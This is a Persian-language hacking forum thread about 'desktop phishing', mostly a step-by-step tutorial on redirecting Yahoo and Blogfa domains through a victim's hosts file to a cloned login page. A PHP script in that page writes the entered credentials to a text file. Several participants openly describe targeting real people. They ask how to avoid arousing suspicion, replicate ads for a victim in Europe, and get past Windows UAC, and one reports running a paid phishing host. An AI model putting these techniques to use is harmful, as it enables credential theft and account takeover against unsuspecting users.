خداحافظ

سلام
قبل پست دادن و ایجاد تاپیک جستجو کنید.
تاپیک زیر پست 5و6 :

[Only registered and activated users can see links]

نیازی نیست حتما برای اینکار سرور داشته باشید
میتونید روی لوکال هاست طرف عمل اسپوفینگ رو انجام بدید و
برای اینکه بتونه به اکانتش لاگین بشه و شک نکنه تاپیک زیر رو ببینید ،
توی قسمتی از فیلم یه Trick مربوط به این کار انجام دادم که میتونه کمکتون کنه:

[Only registered and activated users can see links]

موفق باشید./

سلام
سوالی دارم
مثلا وقتی فایل hosts را به ip اختصاصی خودمون تعغیر میدهیم که به صفحه تقلبی خودمون بیاد یه مشکلی است مثلا وقتی کسی وارد اکانت خودش شده و بعد میخواهد از اکانت خودش بیاد بیرون و sign out و با ایمیل id دیگری وارد اکانت خودش بشود به مشکل برمیخورد مثلا میخواهد sign out کنه اما صفحه که باز میشود ارور میدهد و اصلا نمیتواند از این یوزری که داره بیاد بیرون حتی تمام کوکی ها را حذف کردم اما وقتی به آدرس mail میرود دوباره همان نام کاربری که قبل داشته را مینویسه و خارج نمیشود
لطفا راهنمائی کنید برای رفع مشکل
باتشکر
خداحافظ

سلام دوستان خواهش میکنم فوری راهنمائی کنید
فایل hosts را تعغیر دادم به این شکل
127.0.0.1 localhost
100.100.101.100 mail.yahoo.com
خوب مثلا کاری کردم که هر کسی آدرس را وارد کرد به آدرس آی پی اختصاصی من وارد بشود که صفحه تقلبی است
اما خوب اگر آن شخص از آدرس دیگری استفده کرد مثلا از آدرس login.yahoo.com چی ؟ البته همین آدرس هم در فایل hosts تعغیر دادم اما به مشکل بر میخورد یعنی اینکه وقتی شخص مورد نظر به آدرس اصلی یاهو میرود و میخواهد وارد ایمیل خودش بشود وارد این آدرس میشود my.yahoo.com
خوب شک میکنه
خواهش میکنم بگید چکار کنم چند روزه که دنبال همین هستم
چون میخواهم از هر آدرسی وارد شد بتونه وارد ایمیلش بشود
ممنون
خداحافظ

سلام دوستان خواهش میکنم فوری راهنمائی کنید
فایل hosts را تعغیر دادم به این شکل
127.0.0.1 localhost
100.100.101.100 mail.yahoo.com
خوب مثلا کاری کردم که هر کسی آدرس را وارد کرد به آدرس آی پی اختصاصی من وارد بشود که صفحه تقلبی است
اما خوب اگر آن شخص از آدرس دیگری استفده کرد مثلا از آدرس login.yahoo.com چی ؟ البته همین آدرس هم در فایل hosts تعغیر دادم اما به مشکل بر میخورد یعنی اینکه وقتی شخص مورد نظر به آدرس اصلی یاهو میرود و میخواهد وارد ایمیل خودش بشود وارد این آدرس میشود my.yahoo.com
خوب شک میکنه
خواهش میکنم بگید چکار کنم چند روزه که دنبال همین هستم
چون میخواهم از هر آدرسی وارد شد بتونه وارد ایمیلش بشود
ممنون
خداحافظ

سلام
وقتی صفحه فیک رو جایگزین میکنید با یکم تغییر توی سورس صفحه میشه لینک صفحه ایمیل یا سایر خدمات یاهو رو به هر آدرسی که میخوای تغییر بدی! و کلا تمام صفحات رو به این شکل میتونی تقلبیش هم بسازی یکم وقت می خواد روی سورس صفحه باید کار کنی./
موفق باشی

سلام
آقا ممنون فقط سوالی دارم
خوب مثلا آدرس هاس زیر را میزاریم در فایل hosts که شخص مورد نظر با هر کدام از اینها بتونه وارد صفحه تقلب ما بشود
مثلا
mail.yahoo.com
login.yahoo.com
خوب وقتی ما این آدرس ها را روی فایل hosts و روی ip اختصاصی سایت خودمون ست میکنیم و بعد در اسکریپت صفحه تقلبی تعریف میکنیم که وقتی شخص مورد نظر مثلا وارد صفحه تقلبی شد و یوزرنیم و پسورد را وارد که بعدش به صفحه اصلیmail.yahoo.com و یا login.yahoo.com کاربر را انتقال دهد که شک نکنه و بعدش یوزر نیم و پسوردش را وارد میکنه و بعدش وارد ایمیلش بشود
خوب وقتی ما آدرس های زیر را
mail.yahoo.com
login.yahoo.com
را وارد hosts کردیم خوب باز هم دوباره به صفحه تقلبی خودمون انتقال پیدا میکنه
آخه دیگه نمیدونم چکار کنم
یا دارم اشتباه میکنم ؟
میشود توضیحی بدهید باور کنید چند روزه وقتمو گرفته
مرسی

سلام
آقا ممنون فقط سوالی دارم
خوب مثلا آدرس هاس زیر را میزاریم در فایل hosts که شخص مورد نظر با هر کدام از اینها بتونه وارد صفحه تقلب ما بشود
مثلا
mail.yahoo.com
login.yahoo.com
خوب وقتی ما این آدرس ها را روی فایل hosts و روی ip اختصاصی سایت خودمون ست میکنیم و بعد در اسکریپت صفحه تقلبی تعریف میکنیم که وقتی شخص مورد نظر مثلا وارد صفحه تقلبی شد و یوزرنیم و پسورد را وارد که بعدش به صفحه اصلیmail.yahoo.com و یا login.yahoo.com کاربر را انتقال دهد که شک نکنه و بعدش یوزر نیم و پسوردش را وارد میکنه و بعدش وارد ایمیلش بشود
خوب وقتی ما آدرس های زیر را
mail.yahoo.com
login.yahoo.com
را وارد hosts کردیم خوب باز هم دوباره به صفحه تقلبی خودمون انتقال پیدا میکنه
آخه دیگه نمیدونم چکار کنم
یا دارم اشتباه میکنم ؟
میشود توضیحی بدهید باور کنید چند روزه وقتمو گرفته
مرسی

هر آدرس به یه آیپی
اگه میخوای هم صفحه لاگین هم صفحه اصلی یاهو رو جعل کنی:
به 2 تا ip نیاز پیدا میکنی
یکیش رو روی لوکال انجام بدی به یه سرور دیگه نیاز داری
بقیه صفحات مربوط به ایمیل هم میتونی منتقل کنی روی آدرس دومی که برای صفحه لاگین ساختی./ شک بر انگیز هم نیست..
پیام خصوصی بده

موفق باشی./

از اینجا نحوه پیاده سازی حمله اصلی را توضیح می دهم، برای دنبال کردن آموزش نیاز به امکانات خاصی نخواهید داشت در نتیجه توصیه می کنم هر مرحله را با دقت دنبال کنید و خودتان روی کامپیوتر انجام دهید.

اگر یادتان باشد گفتم در دسکتاپ فیشینگ نیازی به طراحی جداگانه صفحات برای هر سایت نیست. این در صورتی است که ما یک «بازوی فیشینگ» هوشمند بنویسیم و آن را بین راه کاربر قرار دهیم (حمله MITM). نوشتن این بازو به دانش عمیق برنامه نویسی و آموزش دادن آن به ده ها پست وبلاگی نیاز دارد. در این آموزش برای سادگی کار فقط روی بلاگفا کار میکنیم

این آموزش فقط برای بالا بردن سطح دانش کاربران جهت مقابله با نفوذگران و شبیه سازی کردن یک شرایط واقعی نوشته شده است.

1. xampplite را دانلود و نصب کنید.

2. جایی که xampplite را نصب کردید وارد پوشه apache سپس پوشه conf شده و فایل [Only registered and activated users can see links] را باز کنید. در خط 178 (DocumentRoot) بعد از htdocs اضافه کنید phishing/

این طوری ریشه سرور به پوشه phishing تغییر پیدا می کند. پس این پوشه را در htdocs بسازید.

3. در پوشه phishing یک فایل به نام index.php بسازید و کد زیر را در آن بنویسید

[Only registered and activated users can see links]


4. آپاچی را اجرا کنید (از xampp-control.exe).
[Only registered and activated users can see links]

نکته: در این آموزش ما خودمان هم نفوذگر هستیم و هم قربانی، چون نمی خواهیم از دو کامپیوتر استفاده کنیم.

علت اینکه در شرایط واقعی حتمآ باید IP اختصاصی داشته باشیم اینه که در hosts فقط می تونیم IP اضافه کنیم (نه URL) در نتیجه صفحه تقلبی یا هر نوع اسکریپت دیگری که داریم باید در قسمت ریشه سرور ذخیره شده باشد و با یک آی پی اختصاصی مستقیمآ قابل دسترسی باشد.

5. سایت بلاگفا را باز کنید و از گزینه Save As با اسم blogfa ذخیره کنید. مطمئن شوید که Save as type را روی Complete گذاشته اید.

[Only registered and activated users can see links]

. با هر روشی که دوست دارید فایل هاست را تغییر بدهید و دو خط زیر را به آن اضافه کنید
[Only registered and activated users can see links]

برای کامپیوتر یعنی «آی پی خودم»، در اینجا چون نمی خواهیم از کامپیوتر دیگری استفاده کنیم خودمان هم قربانی هستیم و هم هکر (سرور). در شرایط واقعی این آدرس باید IP سرور اختصاصی باشد.

7. حالا وارد سایت بلاگفا شوید، اگر همه چیز را درست انجام داده باشید باید به جای صفحه اصلی بلاگفا صفحه پیغام Apache is up را مشاهده کنید.

تا اینجا ما سرور اختصاصی خودمان را راه انداخته ایم و با موفقیت سیستم قربانی را هم آلوده کرده ایم تا به جای بلاگفا به سرور ما منتقل شود. حالا باید صفحه تقلبی را بسازیم.

نکته مهم: چون ما «بازوی فیشینگ» هوشمندی نمی سازیم روش ما دو کمبود اصلی خواهد داشت.

اول اینکه باید صفحه تقلبی را به صورت دستی بسازیم و این یعنی باید تمام فایل های گرافیکی که اون صفحه تقلبی را تشکیل می دهند را هم روی سرور مان داشته باشیم چون قربانی به بلاگفا واقعی دسترسی ندارد و مثلآ نمی تواند لوگوی بلاگفا را از سرور واقعی بگیرد. برای قربانی blogfa.com به معنی ریشه سرور شما (نفوذگر) خواهد بود و مثلآ blogfa.com/header.png نه به فایل روی سرور واقعی بلکه به سرور شما اشاره می کند. این یعنی هر محتوای زنده ای که در صفحه جعل شده وجود داشته باشد هم نمی تواند آپدیت شود و همیشه یکسان باقی می ماند (مثلآ آخرین وبلاگ های به روز شده…). همچنین مثلآ اگر ظاهر صفحه واقعی تغییر کند صفحه جعل شده همچنان مثل قبل باقی می ماند.

دوم، به خاطر همان مشکلی که در نکته اول توضیح دادم سایر لینک های بلاگفا از کار می افتند، مثلآ اگر قربانی وارد صفحه اول شود – و ما صفحه اول را جعل کرده باشیم – اگر قربانی به جای وارد کردن اطلاعات از فرم صفحه اول تصمیم بگیرد روی لینک «ورود کاربران» کلیک کند با پیغام Object not found مواجه می شود چون تنها صفحه ای که روی سرور شما وجود دارد همان صفحه اصلی است.

با نوشتن یک بازوی هوشمند هر دو مشکل برطرف می شود. در این مثال ما فقط صفحه اول را جعل می کنیم،

8. حالا به جایی که در مرحله 5 صفحه را ذخیره کردید بروید و محتوای فایل html ای که ذخیره کردید را به جای کدی که برای “Apache is up” در فایل index.php داشتیم ذخیره کنید.

جایی که صفحه را در مرحله 5 ذخیره کردید باید یک پوشه به نام blogfa_files باشد. این پوشه را هم با جاش منتقل کنید کنار فایل index.php واقع در پوشه phishing.

9. حالا دوباره سایت بلاگفا را باز کنید. اگر همه مراحل را به درستی انجام داده باشید باید صفحه بلاگفا را با ظاهری خیلی شبیه به صفحه اصلی ببینید (می توانید با باز کردن آی پی 38.113.162.27 صفحه اصلی را ببینید).

حالا یک نکته کوچولو، باید favicon (آیکون کنار آدرس سایت) را درست کنیم. برای این کار favicon را از [Only registered and activated users can see links] می گیریم. بعد از ذخیره کردن آیکون با اسم favicon.ico و قرار دادن آن در کنار فایل index.php باید به طور اتوماتیک توسط مرورگر نمایش داده شود (گاهی اوقات به خاطر باگ مرورگر ها و cache همان لحظه دیده نمی شود).


به هشت فایل پشت زمینه هم در style.css اشاره شده که آنها را هم باید جداگانه دانلود کرده و در پوشه images کنار بقیه فایل ها قرار دهید تا پشت زمینه دکمه ها و صفحه درست شبیه نسخه اصلی شود. همچنین احتمالآ تغییر ظریفی برای نمایش تبلیغات باید انجام بدهید که آن را به عهده خودتان می گذارم.

حالا که ظاهر سایت را درست کردیم فقط باید قسمت لاگین را دستکاری کنیم تا بتوانیم آنها را ذخیره کنیم.

10. در کنار فایل index.php یک فایل جدید بسازید به نام login.php، این فایل قرار است action فرم لاگین بشود. یعنی اطلاعاتی که در فرم ثبت می شود به این فایل فرستاده می شود تا پردازش شود. در این فایل ما باید کدی بنویسیم که اطلاعات دریافتی را در یک فایل دیگر ذخیره کند.

کد زیر (+) را در فایل login.php قرار دهید:

[Only registered and activated users can see links]


خط اول، کاربر را سریعآ به صفحه اول بر می گرداند، انگار که قسمت لاگین درست کار نمی کند. در غیر این صورت فقط یک صفحه سفید دیده میشه.

خط دوم، میگیم فایل Pass.txt را بساز و اگر وجود داره بهش اضافه کن.

خط سوم، نام کاربری را در فایل بنویس و برو سر خط.

خط چهارم، رمز را در فایل بنویس و برو سر خط.

خط پنجم، تاریخ و ساعت را بنویس، یک خط فاصله بده و برو سر خط.

خط شش، کارمون تموم شد.

حالا بازوی نه چندان باهوش ما آماده است و فقط باید فرم را به جای مقصد اصلی به فایل خودمان هدایت کنیم، برای این کار در فایل index.php عبارت =action را جستجو کنید و مقدار آن را به login.php تغییر دهید.

ست ماهی گیری شما آماده است! حالا صفحه را ریفرش کنید و یک نام کاربری و کلمه عبور الکی در فرم وارد کرده و لاگین کنید. می بینید هیچ اتفاقی نمی افته و فقط انگار صفحه ریفرش میشه
[Only registered and activated users can see links]


حالا اگر کنار فایل index.php را نگاه کنید یک فایل جدید به نام Pass.txt می بینید که حاوی اطلاعات صید شده است.

[Only registered and activated users can see links]

همانطور که می بینید الان هر چیزی در آن فرم نوشته بشه در فایل ثبت میشه، حتی اگر اطلاعات صحیح یا واقعی نباشه. با بهبود اسکریپتی که نوشتیم می توانیم قبل از ذخیره کردن چک کنیم که اطلاعات لاگین معتبر باشه که فقط اطلاعات صحیح را بگیریم. همچنین می توانیم بعد از ذخیره اطلاعات، فرم را پشت پرده برای بلاگفا submit کنیم و کاربر را وارد بلاگفای واقعی کنیم. این طوری سیستم لاگین هم خراب به نظر نمی آید و همه چیز طبیعی به نظر می رسد.

امیدوارم از این مطلب استفاده برده باشید، از آن چه یاد گرفتید استفاده بد نکنید. در مطالب بعدی اگر استقبال زیاد باشه نحوه دفع این حملات را بررسی خواهیم کرد.

با تشکر از اموزش خوبتون.. فایل hosts رو پیدا کردم و ویرایش کردم. اما جواب نداد.. ممنون میشم یه کپی از فایل hosts اموزشیتون ضمیمه کنید تا ببینم تو ویرایش فایل مشگل داشتم و یا اشکال از جای دیگست...با تشکر

سلام
البته سوالی دیگری دارم مثلا صفحه mail.yahoo.com را اگر با ip ایرانی باز کنید تبلیقی در آن باز نمیشود اما اگر با ,,,vp و یا پیروکسی کشور های خارجی باز کنید تبلیقات در آن است خوب میخواهم همین صفحه را برای کسی که در اروپا است بفرستم
و میخواهم تبلغات هم در صفحه تقلبی بیاد اما هر کاری میکنم تبلیقات در صفحه تقلبی باز نمیشود
و اینطوری ممکنه شک کنه که چرا بار اول بدون تبلیقه و بار بعدی که میخواهد لوگین کند در صفحه اصلی تبلبغ میاد
زمانی که در صفحه mail.yahoo.com سورس را کپی کردم هم تبلیغ داشت اما وقتی ذخیره کردم و در هاست گذاشتم تبلیقش باز نمیشود
خواهش میکنم راهنمائی کنید که تبلیف هم در صفحه تقلبی بیاد
باتشکر
منتظر راهنمائی شما هستم
خداحافظ

سلام
سوالی مهم لطفا بگید چگونه میشود در ویندوز 7 فایل hosts را جایگذین کرد چون وقتی فایل را درست کردیم که
برای شخص مورد نظر ارسال کنیم اگر ویندوز 7 داشته باشه بهش اخطار میدهد که میخواهد فایل hosts تعغیر کند
که اگر کار بر تائید نکند فایل hosts هم تعغیر نمیکند
لطفا نحوه رد کردن از این مشکل را هم بگید منظورم اخطار user account control windows 7
چه راه و روشی است
باتشکر

همچنین می توانیم بعد از ذخیره اطلاعات، فرم را پشت پرده برای بلاگفا submit کنیم و کاربر را وارد بلاگفای واقعی کنیم. این طوری سیستم لاگین هم خراب به نظر نمی آید و همه چیز طبیعی به نظر می رسد.

چطوری میشه این کارو انجام داد؟

سلام-مهندس مرسي فيشينگ جديد جالبه فقط راه هاي مقابله با اين فيشينگو قرار شد بذاري بذاري ممنون ميشم

سلام
دوستان چند وقتی بود که از صفحه تقلبی استفاده میکردم البته از روش دسکتاپ فیشینگ و هاست و ip برای این کار خریداری شد
و همه چی خوب کار میکرد و پسورد ها را می آورد اما چند ساعتی است که و قتی وارد صفحه تقلبی میشوید که مثل یاهو
درست شده است وقتی یوزر و پسورد را وارد میکنیم بجائی که پسورد را روی هاست save کند و بعد آن شخص را به صفحه اصلی یاهو ببیرد که آن شخص وارد ایمیل خودش بشود ارور میدهد یعنی تا وارد صفحه تقلبی میشود و یوزر و پسورد را زد و اینتر کرد
این پیغام خطا را میدهد
403 Forbidden
Access to this resource on the server is denied!
Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
خوب چرا اینطوری شده و به صفحه اصلی میل یاهو نمیرود آیا هاستینگ تعغیراتی داده در این چند ساعته
چه کاری کرد برای رفع مشکل
لطفا راهنمائی کنید